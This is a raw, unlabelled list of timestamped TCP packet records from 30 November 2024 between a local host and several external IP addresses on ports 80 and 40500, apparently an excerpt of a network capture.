                                                                                                                  Nov 30, 2024 01:55:29.837953091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.838195086 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.838238001 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.838795900 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.838843107 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.838954926 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.838965893 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.838985920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.839025021 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:29.839159012 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:29.839667082 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.839713097 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.839818954 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.839848995 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.840536118 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.840579033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.840688944 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.840723038 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.841435909 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.841484070 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.841557026 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.841590881 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.842293978 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.842334032 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.842447042 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.842480898 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.843175888 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.843216896 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.843328953 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.843364954 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.844046116 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.844096899 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.844182014 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.844219923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.844923973 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.844969988 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.845067024 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.845102072 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.845797062 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.845915079 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.845947027 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.845999956 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.846679926 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.846714973 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.846838951 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.846872091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.847541094 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.847594976 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.847693920 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.847740889 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.848423004 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.848469973 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.848562002 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.848599911 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.849289894 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.849328995 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.849433899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.849473000 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.850161076 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.850202084 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.850325108 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.850363970 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.850992918 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:29.851032019 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:29.959047079 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:30.656080961 CET4974240500192.168.2.490.156.163.33
                                                                                                                  Nov 30, 2024 01:55:30.817289114 CET405004974290.156.163.33192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.296329021 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.296348095 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.296399117 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.296433926 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.296462059 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.296752930 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.296762943 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.296813965 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.297162056 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.297173023 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.297205925 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.297626972 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.297728062 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.297769070 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.298000097 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.298042059 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.416412115 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.416532993 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.416578054 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.416727066 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.420586109 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.420639038 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.429614067 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.429677963 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.429728031 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.507030964 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.507106066 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.507133961 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.507189989 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.511183023 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.511235952 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.511301041 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.511341095 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.519618034 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.519673109 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.522650957 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.522701025 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.522778988 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.522818089 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.531094074 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.531141043 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.531208038 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.531275034 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.539421082 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.539469957 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.539541006 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.539580107 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.547841072 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.547894955 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.547964096 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.548001051 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.556243896 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.556289911 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.556363106 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.556399107 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.563914061 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.563956976 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.564028025 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.564066887 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.571546078 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.571630955 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.571659088 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.571706057 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.579221964 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.579272985 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.579298973 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.579341888 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.683657885 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.683712006 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.683743954 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.683801889 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.686314106 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.686364889 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.723964930 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.724015951 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.724065065 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.724102974 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.726408005 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.726457119 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.727350950 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.727391958 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.727462053 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.727500916 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.728673935 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:31.732341051 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.732409000 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.732456923 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.732511044 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.737330914 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.737397909 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.737423897 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.737458944 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.742316008 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.742435932 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.742469072 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.742484093 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:31.747298002 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:31.747354031 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:35.672791004 CET4974640500192.168.2.4178.253.102.214
                                                                                                                  Nov 30, 2024 01:55:35.792887926 CET4050049746178.253.102.214192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:35.792974949 CET4974640500192.168.2.4178.253.102.214
                                                                                                                  Nov 30, 2024 01:55:35.794751883 CET4974640500192.168.2.4178.253.102.214
                                                                                                                  Nov 30, 2024 01:55:35.914880037 CET4050049746178.253.102.214192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:35.914931059 CET4974640500192.168.2.4178.253.102.214
                                                                                                                  Nov 30, 2024 01:55:36.034957886 CET4050049746178.253.102.214192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:36.850960016 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:36.971080065 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:37.315712929 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:37.316535950 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:40.684303999 CET4974780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:40.804377079 CET804974791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:40.806493044 CET4974780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:40.827054977 CET4974780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:40.947062969 CET804974791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:42.141488075 CET804974791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:42.142585039 CET4974780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:42.144532919 CET4974780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:42.264534950 CET804974791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:42.546766996 CET405004974290.156.163.33192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:42.546828032 CET4974240500192.168.2.490.156.163.33
                                                                                                                  Nov 30, 2024 01:55:44.197177887 CET4974880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:44.317615032 CET804974891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:44.318502903 CET4974880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:44.325522900 CET4974880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:44.445416927 CET804974891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:44.957777977 CET4974640500192.168.2.4178.253.102.214
                                                                                                                  Nov 30, 2024 01:55:45.123013020 CET4050049746178.253.102.214192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:45.697762012 CET804974891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:45.697822094 CET4974880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:45.697902918 CET4974880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:45.817925930 CET804974891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:47.720174074 CET4974980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:47.840233088 CET804974991.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:47.840749979 CET4974980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:47.840939999 CET4974980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:47.960866928 CET804974991.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:49.224435091 CET804974991.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:49.224520922 CET4974980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:49.234354019 CET4974980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:49.354300022 CET804974991.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:49.971218109 CET4975040500192.168.2.4187.230.224.189
                                                                                                                  Nov 30, 2024 01:55:50.091510057 CET4050049750187.230.224.189192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:50.091581106 CET4975040500192.168.2.4187.230.224.189
                                                                                                                  Nov 30, 2024 01:55:50.093462944 CET4975040500192.168.2.4187.230.224.189
                                                                                                                  Nov 30, 2024 01:55:50.213417053 CET4050049750187.230.224.189192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:50.213470936 CET4975040500192.168.2.4187.230.224.189
                                                                                                                  Nov 30, 2024 01:55:50.333395958 CET4050049750187.230.224.189192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:51.266789913 CET4975180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:51.387016058 CET804975191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:51.388662100 CET4975180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:51.388778925 CET4975180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:51.508758068 CET804975191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:52.766302109 CET804975191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:52.766364098 CET4975180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:54.978023052 CET4975180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:55.098123074 CET804975191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:55.424717903 CET804975191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:55.425836086 CET4975180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:55:55.437756062 CET4975040500192.168.2.4187.230.224.189
                                                                                                                  Nov 30, 2024 01:55:55.601337910 CET4050049750187.230.224.189192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:57.688707113 CET4050049746178.253.102.214192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:57.688755035 CET4974640500192.168.2.4178.253.102.214
                                                                                                                  Nov 30, 2024 01:55:58.785295963 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:58.785909891 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:58.906039000 CET8049745185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:58.906080008 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:58.906151056 CET4974580192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:58.906179905 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:58.907228947 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:59.027153015 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.283447027 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.283493996 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.283579111 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.283718109 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.283914089 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.283942938 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.283963919 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.283981085 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.284507036 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.284706116 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.284734011 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.284756899 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.284785032 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.285187960 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.285368919 CET8049759185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.285422087 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.314822912 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.314897060 CET4975980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:00.459901094 CET4976540500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:56:00.580034971 CET405004976590.156.160.43192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.580132961 CET4976540500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:56:00.605712891 CET4976540500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:56:00.725714922 CET405004976590.156.160.43192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:00.725846052 CET4976540500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:56:00.845781088 CET405004976590.156.160.43192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:02.347112894 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:02.467056036 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:02.467123032 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:02.467327118 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:02.587197065 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:02.624958038 CET4976540500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:56:02.785320997 CET405004976590.156.160.43192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.800020933 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.800113916 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.800154924 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.800168991 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.800200939 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.800228119 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.800626040 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.800637960 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.800648928 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.800668001 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.800694942 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.801363945 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.801378965 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.801388025 CET8049771185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:03.801407099 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.801419020 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.801436901 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.885732889 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:03.885761023 CET4977180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:05.913155079 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:06.033029079 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:06.033092022 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:06.038530111 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:06.158752918 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.426220894 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.426265955 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.426273108 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.426309109 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.426625967 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.426664114 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.426785946 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.426795006 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.426822901 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.426835060 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.427334070 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.427375078 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.427501917 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.427510977 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.427536964 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.427548885 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.427840948 CET8049777185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:07.427877903 CET4977780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:07.428071022 CET8049777185.215.113.66192.168.2.4
